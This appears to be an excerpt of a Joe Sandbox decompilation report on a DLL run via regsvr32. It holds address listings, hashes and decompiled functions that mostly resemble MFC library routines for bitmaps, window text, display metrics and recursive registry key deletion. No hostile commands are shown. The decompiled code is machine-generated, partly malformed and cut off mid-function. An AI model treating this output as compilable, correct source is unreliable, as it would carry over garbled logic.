0x1001249c
0x1001249e
0x100124a0
0x100124a0
0x100124a0
0x1001249e
0x100124a3
0x100124a7
0x100124ac
0x100124ad
0x100124b0
0x100124b7
0x100124be
0x100124c3
0x100124c5
0x100124c7
0x100124c7
0x100124c7
0x100124c5
0x100124ca
0x100124ce
0x100124de
0x100124e1
0x100124e4
0x100124e9
0x100124eb
0x100124ed
0x100124ed
0x100124ed
0x100124eb
0x100124f0
0x100124f3
0x10012503
0x1001250a
0x10012511
0x10012516
0x10012518
0x1001251a
0x1001251a
0x1001251a
0x10012518
0x1001251c
0x10012520
0x1001252b
0x10012537
0x10012539
0x10012539
0x10012539
0x10012539
0x10012540
0x10012544
0x1001254c
0x10012558
0x10012558
0x10012558
0x1001255a
0x1001255e
0x10012569
0x10012575
0x10012575
0x10012575
0x1001257c
0x1001257f
0x10012586
0x1001258e
0x1001258e
0x1001258e
0x10012595
0x10012598
0x1001259f
0x100125ab
0x100125ab
0x100125ab
0x100125b2
0x100125b5
0x100125bc
0x100125c8
0x100125c8
0x100125c8
0x100125cf
0x100125d2
0x100125d9
0x100125e5
0x100125e5
0x100125e5
0x100125ec
0x100125ef
0x100125f6
0x10012602
0x10012602
0x10012602
0x10012609
0x1001260c
0x10012613
0x1001261f
0x1001261f
0x1001261f
0x10012626
0x10012629
0x10012630
0x10012638
0x10012638
0x10012638
0x1001263f
0x10012642
0x10012649
0x10012651
0x10012651
0x10012651
0x10012658
0x1001265b
0x10012662
0x1001266e
0x1001266e
0x1001266e
0x10012675
0x10012678
0x1001267f
0x1001268b
0x1001268b
0x1001268b
0x10012692
0x10012695
0x1001269c
0x100126a4
0x100126a4
0x100126a4
0x100126a6
0x100126a9
0x100126ac
0x100126b8
0x100126ba
0x100126bf
0x100126c2
0x100126c2
0x100126c2
0x100126d1
0x100126d3
0x100126d3
0x00000000

APIs

_memset.LIBCMT ref: 10012434

Strings

AfxMDIFrame80s, xrefs: 100124D5
AfxFrameOrView80s, xrefs: 100124FA
@, xrefs: 100125D9
@, xrefs: 10012540

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction ID: 475a3f3acc0ffbf0912b6f4f501dab117ae518df3bc7e116c44220daacf7d2ae
Opcode Fuzzy Hash: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
Instruction Fuzzy Hash: 658130B5D00259AADB41CFA4C581BDEBBF8FF08384F118165F949EA181E774DAD4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100017E0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1000C4C7: _memset.LIBCMT ref: 1000C4DE

_strlen.LIBCMT ref: 100018FF
_strlen.LIBCMT ref: 10001971
_strlen.LIBCMT ref: 100019B6
LoadIconA.USER32 ref: 100019FD

Strings

127.0.0.1, xrefs: 100018E8, 100018FA, 1000190E

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _strlen$IconLoad_memset
String ID: 127.0.0.1
API String ID: 858515944-3619153832
Opcode ID: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction ID: 391a885bd144bb184e99009df4bcd3f8a2a5cd6933164126564d3f2e09fb5126
Opcode Fuzzy Hash: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
Instruction Fuzzy Hash: 835106B4D04298DBEB14CFA4D891B9DBBB1EF44344F1081A9E50D6B386DB356E44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 1001486F, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1001486F(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x10057a08; // 0xe86d94f5
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E100146B2(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E100146DD(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100169F6(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E100147F2(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E100147F2(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E100167D5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}

0x1001486f
0x1001486f
0x1001486f
0x10014875
0x1001487c
0x10014883
0x10014889
0x1001488c
0x10014895
0x10014896
0x1001489f
0x100148ad
0x100148b0
0x100148b8
0x100148ce
0x100148d0
0x100148d3
0x100148db
0x100148d5
0x100148d5
0x100148d5
0x100148ea
0x10014968
0x10014968
0x100148ec
0x10014901
0x10014906
0x10014909
0x00000000
0x1001490b
0x1001490c
0x10014912
0x10014917
0x10014919
0x1001491f
0x10014924
0x10014928
0x10014928
0x1001492c
0x10014930
0x10014933
0x10014937
0x1001493a
0x10014941
0x10014944
0x1001494c
0x10014946
0x10014946
0x10014946
0x10014953
0x10014978
0x1001497f
0x10014988
0x10014990
0x1001499d
0x100149a0
0x100149a6
0x100149ac
0x1001495a
0x1001495a
0x10014961
0x10014966
0x10014970
0x10014975
0x00000000
0x00000000
0x00000000
0x00000000
0x10014966
0x10014953
0x10014909
0x100149ad
0x100149ae
0x1001488e
0x1001488e
0x1001488e
0x100149bb

APIs

GlobalLock.KERNEL32 ref: 10014899
lstrlenA.KERNEL32(?), ref: 100148E1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100148FB

Strings

System, xrefs: 10014895

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction ID: 74ffa1d7f554f06ed3380e5a1b3eb1278af2c0b09513685a0b874fafc39ddc5e
Opcode Fuzzy Hash: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
Instruction Fuzzy Hash: FA41B271D00225DFDB04DFA4C885AAEBBB5FF04354F268129E411EF195EB70E986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B3AF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000B3AF(void* __edx, signed int _a116, char _a120) {
				void _v12;
				char _v16;
				signed int _v20;
				int _v24;
				char _v124;
				char _v172;
				intOrPtr _v184;
				int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t26;
				unsigned int _t28;
				intOrPtr _t35;
				unsigned int _t39;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				signed int _t45;

				_t45 =  &_v124;
				_t26 =  *0x10057a08; // 0xe86d94f5
				_a116 = _t26 ^ _t45;
				_push(_t43);
				_push(_t42);
				_t28 = GetMenuCheckMarkDimensions();
				_t38 = _t28;
				_t39 = _t28 >> 0x10;
				_v24 = _t39;
				if(_t28 <= 4 || __ecx <= 5) {
					_push(_t45);
					_push(_t39);
					_v172 = 0x10057298;
					E10017C83( &_v172, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, _t38, _t42, _t43);
					_t40 = E10013965(0x104);
					_v184 = _t40;
					_t35 = 0;
					_v172 = 0;
					if(_t40 != 0) {
						_t35 = E1000CF71(_t40);
					}
					return E10017C60(_t35);
				} else {
					if(__ebx > 0x20) {
						__ebx = 0x20;
					}
					__eax = __ebx - 4;
					asm("cdq");
					__eax = __ebx - 4 - __edx;
					__esi = __ebx + 0xf;
					__esi = __ebx + 0xf >> 4;
					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
					__esi = __esi << 4;
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
					if(__edi > 0xc) {
						__edi = 0xc;
					}
					__eax = 0x20;
					if(__ecx > __eax) {
						_v24 = __eax;
					}
					 &_v12 = E100174D0(__edi,  &_v12, 0xff, 0x80);
					_v24 = _v24 + 0xfffffffa;
					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
					__ecx = __esi + __esi;
					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
					__edx = 0x1002a144;
					_v20 = __esi + __esi;
					_v16 = 5;
					do {
						__si =  *__edx & 0x000000ff;
						__ecx = __edi;
						__si = ( *__edx & 0x000000ff) << __cl;
						__edx =  &(__edx[1]);
						__ecx = __si & 0x0000ffff;
						__eax->i = __ch;
						__eax->i = __cl;
						__eax = __eax + _v20;
						_t21 =  &_v16;
						 *_t21 = _v16 - 1;
					} while ( *_t21 != 0);
					__eax =  &_v12;
					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
					_pop(__edi);
					_pop(__esi);
					 *0x1005aa80 = __eax;
					_pop(__ebx);
					if(__eax == 0) {
						__eax = LoadBitmapA(__eax, 0x7fe3);
						 *0x1005aa80 = __eax;
					}
					__ecx = _a116;
					__ecx = _a116 ^ __ebp;
					__eax = E100167D5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
					__ebp =  &_a120;
					__esp =  &_a120;
					_pop(__ebp);
					return __eax;
				}
			}

0x1000b3b0
0x1000b3ba
0x1000b3c1
0x1000b3c5
0x1000b3c6
0x1000b3c7
0x1000b3cd
0x1000b3d6
0x1000b3d9
0x1000b3dc
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000b3e8
0x1000b3eb
0x1000b3ef
0x1000b3ef
0x1000b3f0
0x1000b3f3
0x1000b3f4
0x1000b3f6
0x1000b3f9
0x1000b3fe
0x1000b402
0x1000b405
0x1000b407
0x1000b40c
0x1000b410
0x1000b410
0x1000b413
0x1000b416
0x1000b418
0x1000b418
0x1000b429
0x1000b431
0x1000b439
0x1000b43c
0x1000b43f
0x1000b443
0x1000b448
0x1000b44b
0x1000b452
0x1000b452
0x1000b456
0x1000b458
0x1000b45b
0x1000b45f
0x1000b462
0x1000b464
0x1000b467
0x1000b46a
0x1000b46a
0x1000b46a
0x1000b46f
0x1000b47b
0x1000b483
0x1000b484
0x1000b485
0x1000b48a
0x1000b48b
0x1000b493
0x1000b499
0x1000b499
0x1000b49e
0x1000b4a1
0x1000b4a3
0x1000b4a8
0x1000b4ab
0x1000b4ab
0x1000b4ac
0x1000b4ac

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1000B3C7
_memset.LIBCMT ref: 1000B429
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 1000B47B
LoadBitmapA.USER32 ref: 1000B493

Strings

, xrefs: 1000B3E8

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction ID: 72b3b778e8896de6b9c4d2b5d37ea691cdfdc38a5381d0430ce67680fa501abd
Opcode Fuzzy Hash: b2a79c12d357676e4b0d2bf410ff4187b19c80d36ed6dad2827428fa924ab4b7
Instruction Fuzzy Hash: 5931F572A0065A9FFB10CF78CCC6AAE7BB5EB44384F25052AE506EB1C5D730EA45C750

Uniqueness

Uniqueness Score: -1.00%

Function 1000D86F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1000D86F(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E1000D6C3() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E100199D4(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1005a760(_a4, _a8);
			}

0x1000d87c
0x1000d895
0x1000d900
0x1000d900
0x1000d902
0x00000000
0x1000d903
0x1000d897
0x1000d89e
0x00000000
0x1000d8b7
0x1000d8b8
0x1000d8bb
0x1000d8c9
0x1000d8cc
0x1000d8d4
0x1000d8d5
0x1000d8d6
0x1000d8d7
0x1000d8de
0x1000d8e1
0x1000d8e5
0x1000d8f4
0x1000d8f9
0x1000d8fc
0x00000000
0x1000d8fc
0x1000d89e
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000D8AD
GetSystemMetrics.USER32 ref: 1000D8C5
GetSystemMetrics.USER32 ref: 1000D8CC

Strings

B, xrefs: 1000D88C
DISPLAY, xrefs: 1000D8E9

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction ID: 9954a119ce47e65a3950f6e4b3e830268b9633322f26d87d987c4675ad6ec402
Opcode Fuzzy Hash: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction Fuzzy Hash: 7C118F71600328ABEB11EF649C84B9F7EA8EF057D0B108066FD09AA14AD6719951CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C570, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C570(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E1000DFD6(__ecx, __eflags, _t26) == 0) {
					_t10 = E1001040B(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E1000E426(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E100140D6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

0x1000c570
0x1000c570
0x1000c572
0x1000c577
0x1000c580
0x1000c589
0x1000c58e
0x1000c590
0x1000c59c
0x1000c59c
0x1000c5a3
0x1000c5fe
0x00000000
0x1000c601
0x1000c5a5
0x1000c5a8
0x1000c5ab
0x1000c5b2
0x1000c5bc
0x1000c5be
0x00000000
0x00000000
0x1000c5c7
0x1000c5cc
0x1000c5ce
0x00000000
0x00000000
0x1000c5d5
0x1000c5db
0x1000c5dd
0x1000c5ea
0x1000c5f6
0x00000000
0x1000c5f6
0x1000c5e0
0x1000c5e6
0x1000c5e8
0x00000000
0x00000000
0x00000000
0x1000c5e8
0x1000c5ad
0x1000c5b0
0x00000000
0x00000000
0x00000000
0x1000c5b0
0x1000c592
0x1000c596
0x00000000
0x00000000
0x00000000
0x1000c598
0x1000c582
0x00000000

Strings

Edit, xrefs: 1000C5C0

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction ID: c36f5ccd8b34139a66e87801a9a5321a409f351d494de0105f07b228c10d2adb
Opcode Fuzzy Hash: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction Fuzzy Hash: F4015E3820070AA7FA65DB258D45F5AB6E5EF056D2F214429F942F10B8CFB0FD91D560

Uniqueness

Uniqueness Score: -1.00%

Function 1000BC89, Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000BC89(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10057a08; // 0xe86d94f5
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E10017BF4(E10027F23, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E10009FA3(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E1000BC89(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10009CB7( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E100167D5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

0x1000bc89
0x1000bc90
0x1000bc94
0x1000bc9b
0x1000bca1
0x1000bca8
0x1000bcad
0x1000bcb5
0x1000bcbb
0x1000bcc1
0x1000bcc4
0x1000bcc7
0x1000bccd
0x1000bcd1
0x1000bcd7
0x1000bce5
0x1000bceb
0x1000bced
0x1000bcef
0x00000000
0x00000000
0x1000bcf1
0x1000bcf7
0x1000bcfb
0x1000bd07
0x1000bd13
0x1000bd17
0x1000bd1d
0x1000bd21
0x1000bd28
0x1000bd2a
0x00000000
0x1000bd2a
0x00000000
0x1000bd28
0x1000bd4b
0x1000bd51
0x1000bd5b
0x1000bd66
0x1000bd53
0x1000bd53
0x1000bd59
0x00000000
0x00000000
0x1000bd59
0x1000bd6b
0x1000bd6b
0x1000bd76
0x1000bd7e
0x1000bd7f
0x1000bd80
0x1000bd89
0x1000bd8e
0x1000bd95

APIs

__EH_prolog3_catch.LIBCMT ref: 1000BCA8
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1000BCC7
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BCE5
RegDeleteKeyA.ADVAPI32(?,?), ref: 1000BD60
RegCloseKey.ADVAPI32(?), ref: 1000BD6B

Part of subcall function 10009FA3: __EH_prolog3.LIBCMT ref: 10009FAA

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction ID: 653bf45c983c6aa9a2c45ec2c29e65d920d70d1e6a7a13c67c9db93679124605
Opcode Fuzzy Hash: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction Fuzzy Hash: 0921A075D0465A9FEB21DF94CC81AEDB7B0FF04390F104126ED55A7290EB705E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013F9E, Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F9E(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10057a08; // 0xe86d94f5
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E1000A0DB(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E100174D0(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
